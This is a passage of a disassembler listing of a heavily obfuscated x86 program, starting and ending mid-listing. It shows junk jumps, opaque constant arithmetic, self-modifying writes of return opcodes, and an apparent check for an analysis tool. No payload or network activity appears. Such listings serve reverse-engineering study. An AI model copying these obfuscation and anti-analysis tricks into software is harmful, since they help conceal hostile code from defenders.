; END OF FUNCTION CHUNK	FOR sub_44EEFE
; ---------------------------------------------------------------------------

loc_449C9A:				; CODE XREF: k2vbe3.d:004424F6j
		mov	[edx], esi
		shr	ecx, 1
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_449C9E:				; CODE XREF: sub_44DAF6:loc_4424E9j
		xor	esi, 0CAC44538h
		add	esi, ebp
		jmp	loc_44C4E9
; END OF FUNCTION CHUNK	FOR sub_44DAF6

; =============== S U B	R O U T	I N E =======================================



sub_449CAB	proc near		; CODE XREF: k2vbe3.d:00443564j
					; sub_448B5E+1086Ep

; FUNCTION CHUNK AT 00450AF7 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451868 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454F78 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		call	sub_451759
		push	ebx
		push	0A473C4D3h
		jmp	loc_450AF7
sub_449CAB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_449CBF:				; CODE XREF: k2vbe3.d:00441607j
		jg	loc_448376

loc_449CC5:				; CODE XREF: k2vbe3.d:0045392Dj
		xor	edi, 564CA82Bh
		or	eax, 6A4FBB10h
		test	ebp, edi
		jmp	loc_44BEDE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_537. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454463

loc_449CD9:				; CODE XREF: sub_454463+1j
		jmp	loc_44E586
; END OF FUNCTION CHUNK	FOR sub_454463
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454639

loc_449CDE:				; CODE XREF: sub_454639-604j
		jmp	loc_451338
; END OF FUNCTION CHUNK	FOR sub_454639
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B359

loc_449CE3:				; CODE XREF: sub_44B359+2E2Ej
		jmp	sub_44B359
; END OF FUNCTION CHUNK	FOR sub_44B359
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590BA

loc_449CE8:				; CODE XREF: sub_4590BA-16D9Dj
		xchg	edx, [esp+4+var_4]
		jmp	loc_44430B
; END OF FUNCTION CHUNK	FOR sub_4590BA
; ---------------------------------------------------------------------------

loc_449CF0:				; CODE XREF: k2vbe3.d:00451A6Dj
		xchg	edi, ebx
		jge	loc_455725
		mov	[ecx], edi
; START	OF FUNCTION CHUNK FOR sub_44EF51

loc_449CFA:				; CODE XREF: k2vbe3.d:loc_4448E1j
					; sub_44EF51:loc_451A51j
		and	edx, 55C5D9B6h
		add	edx, 88140A4Dh
		and	edx, 2DCCA01Ch
		add	edx, 0F4008403h
		xchg	edx, [esp+0]
		jmp	loc_44CAFF
; END OF FUNCTION CHUNK	FOR sub_44EF51
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_449D1A:				; CODE XREF: sub_443FC1+11j
		call	sub_44990B

loc_449D1F:				; CODE XREF: sub_446CE6:loc_43C9D0j
		jz	loc_43DFA2

loc_449D25:				; CODE XREF: k2vbe3.d:loc_4476D8j
					; sub_451222+ABBDj
		jmp	loc_455284
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A7C2

loc_449D2A:				; CODE XREF: sub_44A7C2+6j
		jmp	loc_450CF1
; END OF FUNCTION CHUNK	FOR sub_44A7C2
; ---------------------------------------------------------------------------
		or	edi, 617C5329h
		jmp	loc_43DF92
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449774

loc_449D3A:				; CODE XREF: sub_449774:loc_449783j
		or	edi, 0BD90257Dh
		sub	edi, 0B232C74Bh
		and	edi, 6B6F404Eh
		test	edi, 10000h
		jmp	loc_43DED3
; END OF FUNCTION CHUNK	FOR sub_449774
; ---------------------------------------------------------------------------

loc_449D57:				; CODE XREF: k2vbe3.d:0044271Bj
		mov	eax, [ebp+8]
		jmp	loc_441CA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_449D5F:				; CODE XREF: sub_44C90E:loc_44A72Ej
		cmp	dword ptr [ebp-10Ch], 6D676552h
		jnz	loc_459FE1
		jmp	loc_44A50F
; END OF FUNCTION CHUNK	FOR sub_44C90E

; =============== S U B	R O U T	I N E =======================================



sub_449D74	proc near		; DATA XREF: k2vbe3.d:004423FBo

; FUNCTION CHUNK AT 00448BB1 SIZE 00000005 BYTES

		mov	byte ptr [eax],	0C3h
		jmp	loc_448BB1
sub_449D74	endp

; ---------------------------------------------------------------------------

loc_449D7C:				; CODE XREF: k2vbe3.d:0044E1EBj
		mov	eax, [esp]
		push	edx
		push	ecx
		mov	ecx, ebx
		jmp	loc_454FF4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45890F

loc_449D88:				; CODE XREF: sub_45890F+17j
					; k2vbe3.d:0045A66Dj
		xor	edx, 223F4D9h
		add	edx, ebp
		push	ecx
		push	342D8242h
		pop	ecx
		or	ecx, 1A6ACAABh
		jmp	loc_45229B
; END OF FUNCTION CHUNK	FOR sub_45890F

; =============== S U B	R O U T	I N E =======================================



sub_449DA2	proc near		; CODE XREF: sub_44ED3C:loc_45C1A5j

; FUNCTION CHUNK AT 0043F70D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00440186 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00441035 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447C91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451663 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00459B1F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045B6A7 SIZE 00000005 BYTES

		push	ebx
		pushf

loc_449DA4:				; CODE XREF: k2vbe3.d:loc_43CCFBj
		push	0B73361BEh
		xor	ebx, esi
		jmp	loc_45B6A7
sub_449DA2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE2A

loc_449DB0:				; CODE XREF: sub_43FE2A-2A80j
		call	sub_44AF54

loc_449DB5:				; CODE XREF: sub_444EFA+4949j
		jmp	loc_450792
; END OF FUNCTION CHUNK	FOR sub_43FE2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_449DBA:				; CODE XREF: sub_44416D+139B0j
		jz	loc_449DCD
		push	ebp
		mov	eax, [ebp-20h]
		call	sub_450EDB
		pop	ecx
		mov	[ebp-20h], eax
; END OF FUNCTION CHUNK	FOR sub_44416D
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_449DCD:				; CODE XREF: sub_44416D:loc_449DBAj
					; sub_440D7B:loc_457B01j ...
		mov	eax, [ebp+var_20]
		jmp	loc_45B6DC
; END OF FUNCTION CHUNK	FOR sub_440D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458BA9

loc_449DD5:				; CODE XREF: sub_458BA9:loc_44DB0Ej
		and	ebx, edi
		jmp	loc_440F71
; END OF FUNCTION CHUNK	FOR sub_458BA9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C579

loc_449DDC:				; CODE XREF: sub_44C579+Bj
		push	98813E83h
		pop	edi
		rol	edi, 5
		sub	edi, 3BB52216h
		xor	edi, 3E331906h
		rol	edi, 1Ch
		jmp	loc_44136E
; END OF FUNCTION CHUNK	FOR sub_44C579
; ---------------------------------------------------------------------------

loc_449DF9:				; CODE XREF: k2vbe3.d:loc_4473C6j
		or	edi, 1FBFBBEh
		xor	edi, 0CCD1532Fh
		and	edi, 6EBFCAD5h
		add	edi, 0DC19A013h
		xchg	edi, [esp]
		jmp	loc_457381
; ---------------------------------------------------------------------------
		jmp	loc_44D27C
; ---------------------------------------------------------------------------
		pop	ecx
		pop	ebp
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_449E21:				; CODE XREF: sub_45512F+571Cj
		jmp	sub_45B74D
; END OF FUNCTION CHUNK	FOR sub_45512F
; ---------------------------------------------------------------------------

loc_449E26:				; CODE XREF: k2vbe3.d:00454D63j
		jmp	loc_4569CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_449E2B:				; CODE XREF: sub_45101A-9DDFj
		jmp	loc_442B77
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_449E30:				; CODE XREF: sub_44F557-64F5j
					; sub_4426DF:loc_45AF54j
		mov	eax, ds:dword_44BCF8
		jmp	loc_45AC6D
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------

loc_449E3B:				; DATA XREF: sub_44083C:loc_441A74o
		sub	al, 99h
		push	offset loc_459FB8
		jmp	locret_447A8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459FFC

loc_449E47:				; CODE XREF: sub_459FFC+14j
		push	edi
		push	0C6ECCDD9h
		pop	edi
		sub	edi, 0F7709632h
		jmp	loc_45BCD4
; END OF FUNCTION CHUNK	FOR sub_459FFC
; ---------------------------------------------------------------------------

loc_449E59:				; CODE XREF: k2vbe3.d:0043C6F8j
		jp	loc_447646

; =============== S U B	R O U T	I N E =======================================



sub_449E5F	proc near		; CODE XREF: sub_454E69-15F00p

; FUNCTION CHUNK AT 004503F4 SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [eax]
		jmp	loc_4503F4
sub_449E5F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FEF3

loc_449E6A:				; CODE XREF: sub_44FEF3:loc_45768Aj
		xor	edx, 7E272527h
		add	edx, ebp
		push	offset sub_45AAEB
		jmp	loc_44DCEB
; END OF FUNCTION CHUNK	FOR sub_44FEF3
; ---------------------------------------------------------------------------
		cmp	ecx, 9E1817F3h
		jmp	loc_449F86
; ---------------------------------------------------------------------------

loc_449E87:				; CODE XREF: k2vbe3.d:loc_456D4Cj
		xchg	edi, [esp]
		jmp	sub_4436CE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_78. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452CF7

loc_449E90:				; CODE XREF: sub_452CF7-145CCj
		jmp	loc_45C01A
; END OF FUNCTION CHUNK	FOR sub_452CF7
; ---------------------------------------------------------------------------
		jge	nullsub_283
		jmp	sub_44FA5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448472

loc_449EA0:				; CODE XREF: sub_448472:loc_459D53j
		mov	eax, 320057C2h
		push	edi
		push	0DF23B8Bh
		pop	edi
		xor	edi, 0D5576EA4h
		rol	edi, 14h
		and	edi, 61DA902Dh
		jmp	loc_442153
; END OF FUNCTION CHUNK	FOR sub_448472
; ---------------------------------------------------------------------------

loc_449EC0:				; CODE XREF: k2vbe3.d:00455A04j
		mov	ecx, edx
		xchg	ecx, [esp]
		call	sub_454E83
		mov	eax, 9DD7AB44h
		push	offset sub_44E8BE
		jmp	loc_44E8CD
; ---------------------------------------------------------------------------

loc_449ED9:				; CODE XREF: k2vbe3.d:004442CCj
		sub	ecx, 0A352A80Ch
		and	ecx, 9E9812F0h
		add	ecx, 0E3B3FA0Ch
		mov	ecx, [ecx]
		jns	loc_45280F
		jmp	loc_4543DA

; =============== S U B	R O U T	I N E =======================================



sub_449EF8	proc near		; CODE XREF: k2vbe3.d:0044DE9Cj
					; sub_44FBB2+Cp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044C1B8 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, 0F16E0C5Bh
		call	sub_448AE2

loc_449F07:				; CODE XREF: sub_4586FE:loc_44D7BCj
		add	eax, 700BE689h
		xchg	eax, [esp-4+arg_0]
		jmp	loc_44C1B8
sub_449EF8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xor	edx, 0DFFCDAF1h
		mov	esi, edi
		jmp	sub_44EB3F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408BD

loc_449F22:				; CODE XREF: sub_4408BD:loc_44C89Fj
					; k2vbe3.d:0044C8AEj
		rol	eax, 1Ah
		add	eax, 40F76BDDh
		add	eax, ebp
		call	sub_456CDF
; END OF FUNCTION CHUNK	FOR sub_4408BD
; START	OF FUNCTION CHUNK FOR sub_454EDD

loc_449F32:				; CODE XREF: sub_454EDD+4EA1j
		jmp	loc_455A44
; END OF FUNCTION CHUNK	FOR sub_454EDD
; ---------------------------------------------------------------------------

loc_449F37:				; CODE XREF: k2vbe3.d:0044C2D5j
		jmp	loc_45AC25
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D16B

loc_449F3C:				; CODE XREF: sub_44D16B-F4D3j
		jmp	loc_44BF47
; END OF FUNCTION CHUNK	FOR sub_44D16B
; ---------------------------------------------------------------------------
		jnp	loc_43F2C9
		jmp	sub_443F0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441885

loc_449F4C:				; CODE XREF: sub_441885+1A129j
		js	loc_45BCDE
		test	esi, ebp
		jmp	loc_43D577
; END OF FUNCTION CHUNK	FOR sub_441885
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_243. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_449F5A:				; CODE XREF: k2vbe3.d:loc_43E978j
		and	ecx, 0AEC78558h
		rol	ecx, 7
		add	ecx, 0BC816A86h
		xchg	ecx, [esp]
		jmp	loc_43F7FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_449F71:				; CODE XREF: sub_44B912:loc_44E581j
		push	offset sub_4561EE
		jmp	loc_452E6C
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_449F7B:				; CODE XREF: k2vbe3.d:loc_44A3E9j
					; sub_43C3A9+1DD01j
		jz	loc_455118
		jmp	loc_442039
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------

loc_449F86:				; CODE XREF: k2vbe3.d:00449E82j
		jb	loc_446CAF
		shr	eax, 14h
		jmp	sub_43D488
; ---------------------------------------------------------------------------

loc_449F94:				; DATA XREF: sub_453347:loc_44D61Do
		pop	edx
		lea	eax, loc_45A8FB
		mov	byte ptr [eax],	0C3h
		jmp	loc_44819E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E503

loc_449FA3:				; CODE XREF: sub_44E503:loc_45A8FBj
		pop	edx
		push	offset loc_43EA5D
		jmp	nullsub_382
; END OF FUNCTION CHUNK	FOR sub_44E503
; ---------------------------------------------------------------------------

loc_449FAE:				; CODE XREF: k2vbe3.d:004543D5j
		pushf
; START	OF FUNCTION CHUNK FOR sub_4486D7

loc_449FAF:				; CODE XREF: sub_4486D7:loc_4543C2j
		sub	eax, 93A40F4Ch
		rol	eax, 7
		add	eax, 5F07B75Eh
		call	sub_44662B
		test	al, al
		jmp	loc_459E17
; END OF FUNCTION CHUNK	FOR sub_4486D7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_454. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C391

loc_449FCB:				; CODE XREF: sub_45C391+7j
		jmp	nullsub_518
; END OF FUNCTION CHUNK	FOR sub_45C391
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4506C3

loc_449FD0:				; CODE XREF: sub_4506C3-15BDj
		jmp	loc_43D1E3
; END OF FUNCTION CHUNK	FOR sub_4506C3
; ---------------------------------------------------------------------------

loc_449FD5:				; CODE XREF: k2vbe3.d:0044DEE4j
		jmp	loc_45A7E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C224

loc_449FDA:				; CODE XREF: sub_44C224+12j
		jmp	loc_451CD9
; END OF FUNCTION CHUNK	FOR sub_44C224
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE2A

loc_449FDF:				; CODE XREF: sub_43FE2A+31C5j
		jmp	nullsub_55
; END OF FUNCTION CHUNK	FOR sub_43FE2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E88E

loc_449FE4:				; CODE XREF: sub_43E88E+15j
		jmp	loc_452E2E
; END OF FUNCTION CHUNK	FOR sub_43E88E

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_449FE9	proc near		; CODE XREF: sub_4512B9+1p

; FUNCTION CHUNK AT 004405A5 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00442305 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045073B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004553C1 SIZE 0000000A BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		jmp	loc_45073B
sub_449FE9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446478

loc_449FF2:				; CODE XREF: sub_446478+7C3j
		shr	ebp, 1

loc_449FF4:				; CODE XREF: sub_450359:loc_45ACD9j
		call	sub_44B4E4
		mov	edx, 277EFE57h
		push	eax
		push	198DE393h
		jmp	loc_45807C
; END OF FUNCTION CHUNK	FOR sub_446478
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D37

loc_44A009:				; CODE XREF: sub_452D37-167j
		jnz	loc_44BC6A

loc_44A00F:				; CODE XREF: sub_4443DD+BD47j
		jmp	nullsub_167
; END OF FUNCTION CHUNK	FOR sub_452D37
; ---------------------------------------------------------------------------
		mov	ebp, esi
		and	edi, ebp
		jmp	loc_44BC6A
; ---------------------------------------------------------------------------
		push	eax
		jmp	sub_44C357
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_44A023:				; CODE XREF: sub_446E24:loc_45AA4Cj
		jz	loc_4430FF

loc_44A029:				; CODE XREF: sub_43FEF8+168Bj
		jmp	loc_459B31
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
		jb	loc_4522A1
		jmp	loc_4430FC
; ---------------------------------------------------------------------------

loc_44A039:				; CODE XREF: k2vbe3.d:00447B98j
		jo	loc_459DFF
		or	ebp, ecx
		jmp	loc_451FCD
; ---------------------------------------------------------------------------

loc_44A046:				; CODE XREF: k2vbe3.d:0045ADC1j
		push	offset loc_453641
		jmp	locret_4462A1
; ---------------------------------------------------------------------------

loc_44A050:				; CODE XREF: k2vbe3.d:0043E0BEj
		jz	loc_44BC26

; =============== S U B	R O U T	I N E =======================================



sub_44A056	proc near		; CODE XREF: sub_43F7AC:loc_4471AAp
		xchg	eax, [esp+0]
		pop	eax
		xor	eax, 0C22CABB5h
		call	sub_43D7A9

loc_44A065:				; CODE XREF: sub_4566F8+9j
		jmp	sub_443A95
sub_44A056	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508A3

loc_44A06A:				; CODE XREF: sub_4508A3:loc_44389Ej
		mov	ebp, esp
		call	sub_4588E6

loc_44A071:				; CODE XREF: sub_43CCD0+17AF9j
		jmp	loc_44B968
; END OF FUNCTION CHUNK	FOR sub_4508A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_44A076:				; CODE XREF: sub_43C3A9+11EC5j
		jz	loc_457BAA
		jmp	loc_458EB7
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------

locret_44A081:				; CODE XREF: k2vbe3.d:loc_44E8CDj
		retn
; ---------------------------------------------------------------------------

loc_44A082:				; CODE XREF: k2vbe3.d:004583A8j
		jmp	sub_459AEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44A087:				; CODE XREF: sub_44C90E+8C5j
		jmp	loc_458E1D
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_44A08C:				; CODE XREF: sub_447664:loc_454402j
		pop	ebp
		rol	eax, 1Ch
		sub	eax, 0B623DE8Fh
		and	eax, 17310211h
		jmp	loc_450DD2
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------

loc_44A0A1:				; CODE XREF: k2vbe3.d:0045B868j
		mov	ds:dword_44286C, eax
		retn
; ---------------------------------------------------------------------------

loc_44A0A8:				; CODE XREF: k2vbe3.d:00444499j
		jmp	locret_452A71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D98C

loc_44A0AD:				; CODE XREF: sub_43D98C+Dj
		jmp	loc_4427E1
; END OF FUNCTION CHUNK	FOR sub_43D98C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D488

loc_44A0B2:				; CODE XREF: sub_43D488+Cj
		rol	eax, 12h
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43D488
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A502

loc_44A0B7:				; CODE XREF: sub_45A502+Aj
		jmp	nullsub_504
; END OF FUNCTION CHUNK	FOR sub_45A502
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44600A

loc_44A0BC:				; CODE XREF: sub_44600A+9j
		jmp	loc_459185
; END OF FUNCTION CHUNK	FOR sub_44600A

; =============== S U B	R O U T	I N E =======================================



sub_44A0C1	proc near		; CODE XREF: sub_442DF0+5D05p
		push	edx
		jmp	loc_4407D7
sub_44A0C1	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_404. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BB73

loc_44A0C8:				; CODE XREF: sub_44BB73+9019j
		jmp	sub_4436CE
; END OF FUNCTION CHUNK	FOR sub_44BB73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CE6C

loc_44A0CD:				; CODE XREF: sub_44CE6C+10j
		jmp	loc_44EE64
; END OF FUNCTION CHUNK	FOR sub_44CE6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E9

loc_44A0D2:				; CODE XREF: sub_4448E9+Fj
		jmp	loc_44897F
; END OF FUNCTION CHUNK	FOR sub_4448E9

; =============== S U B	R O U T	I N E =======================================



sub_44A0D7	proc near		; CODE XREF: k2vbe3.d:0044F2EDj
					; sub_4553CC-4604p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D5AB SIZE 0000002B BYTES
; FUNCTION CHUNK AT 0043FC8A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00440128 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00441EB0 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00445384 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044AD87 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B485 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BDE5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459533 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C180 SIZE 00000005 BYTES

		xchg	eax, [esp+0]

loc_44A0DA:				; CODE XREF: sub_44083C:loc_45A2C3j
		pop	eax
		xchg	edx, [esp+0]
		mov	eax, edx
		pop	edx
		jmp	loc_44B485
sub_44A0D7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_44A0E6:				; CODE XREF: k2vbe3.d:loc_4426A1j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_44A0E7:				; CODE XREF: sub_43DFE1+DA62j
		ja	loc_44BC41
		ja	loc_44AF31
		jmp	loc_444BFD
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
		push	8FDE33C9h
		pop	eax
		sub	eax, 0D407F83Ah
		add	eax, 13164E25h
		push	eax
		pushf
		push	732CE6B0h
		jmp	loc_43C961
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_44A116:				; CODE XREF: sub_44CA34+F00Cj
		test	ebp, 53FB2E2Ch
		jmp	loc_450D68
; END OF FUNCTION CHUNK	FOR sub_44CA34
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EFC9

loc_44A121:				; CODE XREF: sub_43EFC9:loc_452F83j
		xor	edx, 0E0FC8637h
		and	edx, 5E4B5997h
		jnz	loc_4535DE
; END OF FUNCTION CHUNK	FOR sub_43EFC9
; START	OF FUNCTION CHUNK FOR sub_4475D5

loc_44A133:				; CODE XREF: sub_4475D5+ADE4j
		jmp	loc_4452E1
; END OF FUNCTION CHUNK	FOR sub_4475D5
; ---------------------------------------------------------------------------

loc_44A138:				; CODE XREF: k2vbe3.d:0044C0B1j
		jmp	loc_446A6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465B1

loc_44A13D:				; CODE XREF: sub_4465B1+Dj
		jmp	nullsub_56
; END OF FUNCTION CHUNK	FOR sub_4465B1
; ---------------------------------------------------------------------------

loc_44A142:				; CODE XREF: k2vbe3.d:00446514j
		jmp	loc_457A8E
; ---------------------------------------------------------------------------

loc_44A147:				; CODE XREF: k2vbe3.d:0043CD6Fj
		jmp	loc_45B6E9
; ---------------------------------------------------------------------------
		sub	ebp, 33180122h
		cmp	ecx, 67CE71Fh
		jmp	loc_4535D3
; ---------------------------------------------------------------------------

loc_44A15D:				; DATA XREF: sub_44A6BD+D30Do
		xchg	edx, [esp]
		mov	ecx, ebp
		xchg	ecx, [esp]
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_447DD9
; ---------------------------------------------------------------------------

loc_44A16F:				; CODE XREF: k2vbe3.d:004420FAj
		pop	ecx
		and	ecx, 90C49207h
		sub	ecx, 7D9ED31Bh
		and	ecx, 0C142B587h
		xor	ecx, 114CA5A0h
		add	ecx, 6FF8810Eh
		xchg	ecx, [esp]

loc_44A191:				; CODE XREF: k2vbe3.d:loc_454377j
		jmp	loc_44119F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_44A196:				; CODE XREF: sub_447E07:loc_457F41j
		sub	al, 99h
		push	0DD51068Eh
		pop	edx
		xor	edx, 45DA825Ah
		add	edx, 4BB1D89Bh
		add	edx, ebp
		jmp	loc_4447FF
; END OF FUNCTION CHUNK	FOR sub_447E07

; =============== S U B	R O U T	I N E =======================================



sub_44A1B1	proc near		; CODE XREF: sub_456541-12C35p
					; k2vbe3.d:00452F90j

; FUNCTION CHUNK AT 0043C3A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444456 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00445E54 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004494AF SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044A60B SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044D92C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045131D SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004552AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455444 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455DF9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004564AB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00456E2F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458DF8 SIZE 0000001B BYTES

		xchg	esi, [esp+0]
		pop	esi
		jnz	loc_45131D
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 4
		mov	eax, [ebp-4]
		jmp	loc_4552AE
sub_44A1B1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F946

loc_44A1CA:				; CODE XREF: sub_44F946+3j
		xchg	eax, [esp+4+var_4]
		push	0BFDC47A3h
		pop	edx
		add	edx, 1920F292h
		rol	edx, 4
		jmp	loc_45810C
; END OF FUNCTION CHUNK	FOR sub_44F946
; ---------------------------------------------------------------------------

locret_44A1E1:				; CODE XREF: k2vbe3.d:00456D46j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448834

loc_44A1E2:				; CODE XREF: sub_448834-1E00j
		pop	ebx
		add	ebx, 6AAC0DF1h
		and	ebx, 0C5D27ACCh
		add	ebx, 8B301072h
		add	ebx, ebp
		call	sub_44FF34

loc_44A1FC:				; CODE XREF: k2vbe3.d:loc_450951j
					; k2vbe3.d:0045794Aj
		push	ebx
; END OF FUNCTION CHUNK	FOR sub_448834

; =============== S U B	R O U T	I N E =======================================



sub_44A1FD	proc near		; CODE XREF: sub_452D37-7B3Ep

; FUNCTION CHUNK AT 00445486 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	2
		push	offset loc_44AC23
		jmp	loc_445486
sub_44A1FD	endp


; =============== S U B	R O U T	I N E =======================================



sub_44A20D	proc near		; DATA XREF: k2vbe3.d:00459A87o
		add	edx, ebp
		add	edx, 75D6E449h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_43DC0D
		jmp	loc_43E68F
sub_44A20D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4536DC

loc_44A226:				; CODE XREF: sub_4536DC-14881j
					; sub_445F22+Cj
		xchg	eax, [esp+0]
